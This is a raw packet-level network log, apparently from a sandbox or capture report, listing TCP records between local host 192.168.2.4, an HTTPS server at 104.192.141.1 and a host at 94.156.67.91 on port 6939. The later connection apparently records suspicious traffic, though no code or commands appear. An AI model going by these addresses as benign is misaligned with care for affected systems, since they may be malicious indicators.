May 24, 2024 05:09:40.569413900 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.569477081 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.569519043 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.569606066 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.569606066 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.569606066 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.569668055 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.569725990 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.571965933 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.572017908 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.572061062 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.572067976 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.572135925 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.572180986 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.572180986 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.572212934 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.574769020 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.574824095 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.574866056 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.574960947 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.574960947 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.574960947 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.575026035 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.575082064 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.577518940 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.577570915 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.577613115 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.577714920 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.577716112 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.577716112 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.577779055 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.577837944 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.580058098 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.580107927 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.580142975 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.580245018 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.580245972 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.580245972 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.580307961 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.580388069 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.582632065 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.582685947 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.582727909 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.582742929 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.582792044 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.582842112 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.582842112 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.582843065 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.652672052 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.652753115 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.652941942 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.652942896 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.653003931 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.653305054 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.653956890 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.654118061 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.655349016 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.655427933 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.655440092 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.655499935 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.655518055 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.655522108 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.655550003 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.655564070 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.655580997 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.655613899 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.657756090 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.657812119 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.657819986 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.657835960 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.657851934 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.657866001 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.657879114 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.657883883 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.657898903 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.657926083 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.660048962 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.660101891 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.660115004 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.660124063 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.660140038 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.660156965 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.660165071 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.660173893 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.660195112 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.660219908 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.661973953 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.662029028 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.662046909 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.662060022 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.662092924 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.662092924 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.662122965 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.662137985 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.662167072 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.662184954 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.663916111 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.663968086 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.663986921 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.664000034 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.664028883 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.664030075 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.664047956 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.664057970 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.664092064 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.664113045 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.665877104 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.665936947 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.665951014 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.665962934 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.665986061 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.665994883 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.666013002 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.666023016 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.666054964 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.666075945 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.667344093 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.667399883 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.667422056 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.667434931 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.667480946 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.667500973 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.668194056 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.668261051 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.668384075 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.668452978 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.668469906 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.668524981 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.668567896 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:40.668623924 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:40.742379904 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:43.138477087 CEST	49736	443	192.168.2.4	104.192.141.1
May 24, 2024 05:09:43.138566017 CEST	443	49736	104.192.141.1	192.168.2.4
May 24, 2024 05:09:47.862864971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:47.867947102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:47.868114948 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:47.868211031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:47.921432972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.485816956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.490521908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.490690947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.503962040 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.541276932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.714432955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.729707956 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.734601021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.942825079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.942898989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.943070889 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.943089008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.943100929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.943111897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.943234921 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.943547010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.943731070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.946352959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.946362972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.946408987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.946438074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.947566986 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.947618961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.952187061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.952197075 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:48.952263117 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:48.952361107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.002793074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.003227949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.003377914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.031642914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.031717062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.031877041 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.031891108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.032027006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.032175064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.032185078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.032315969 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.032522917 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.035654068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.035664082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.035758018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.035851002 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.036432028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.036441088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.036503077 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.041248083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.041332006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.041434050 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.045979023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.045990944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.046154976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.046916962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.046969891 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.047003031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.050771952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.050854921 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.051951885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.052006006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.052069902 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.055499077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.057166100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.057234049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.057337046 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.060288906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.060451031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.062412024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.062475920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.062540054 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.065212965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.067384958 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.067450047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.067461967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.069928885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.070131063 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.072577953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.074670076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.074724913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.108530998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.108735085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.120471954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.120610952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.120681047 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.120695114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.120884895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.120948076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.121051073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121062994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121072054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121107101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.121584892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121635914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.121669054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121872902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121884108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121891975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.121927977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.121963024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.122447968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124480963 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124491930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124531984 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.124592066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124741077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124779940 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.124895096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.124948978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.125222921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.128071070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.128128052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.129961014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.130197048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.130248070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.132730961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.132781982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.132791996 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.132940054 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.134684086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.134749889 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.137809992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.137820005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.137988091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.139425993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.142271042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.142421007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.142469883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.144162893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.144226074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.147176981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.147234917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.147387981 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.148921967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.152017117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.152115107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.152179956 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.153628111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.153692007 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.156048059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.156131983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.156184912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.158356905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.160021067 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.160082102 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.160144091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.163077116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.163239956 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.163887978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.163999081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.164069891 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.167690992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.167742014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.167793036 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.167824030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.167850018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.167866945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.167892933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.171422005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.171506882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.171521902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.171535015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.171624899 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.172537088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.175048113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.175128937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.175146103 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.177277088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.177292109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.177433014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.178680897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.178744078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.181988955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.201399088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.201540947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.201616049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.206325054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.206342936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.206485987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.209357023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209404945 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.209414959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209557056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209592104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.209676027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209800005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209836960 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.209912062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209928989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.209961891 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.210071087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210186005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210220098 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.210341930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210360050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210374117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210402012 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.210927010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.210972071 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.211013079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.211128950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.211167097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.211275101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.213481903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.213499069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.213529110 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.213555098 CEST	6939	49737	94.156.67.91	192.168.2.4
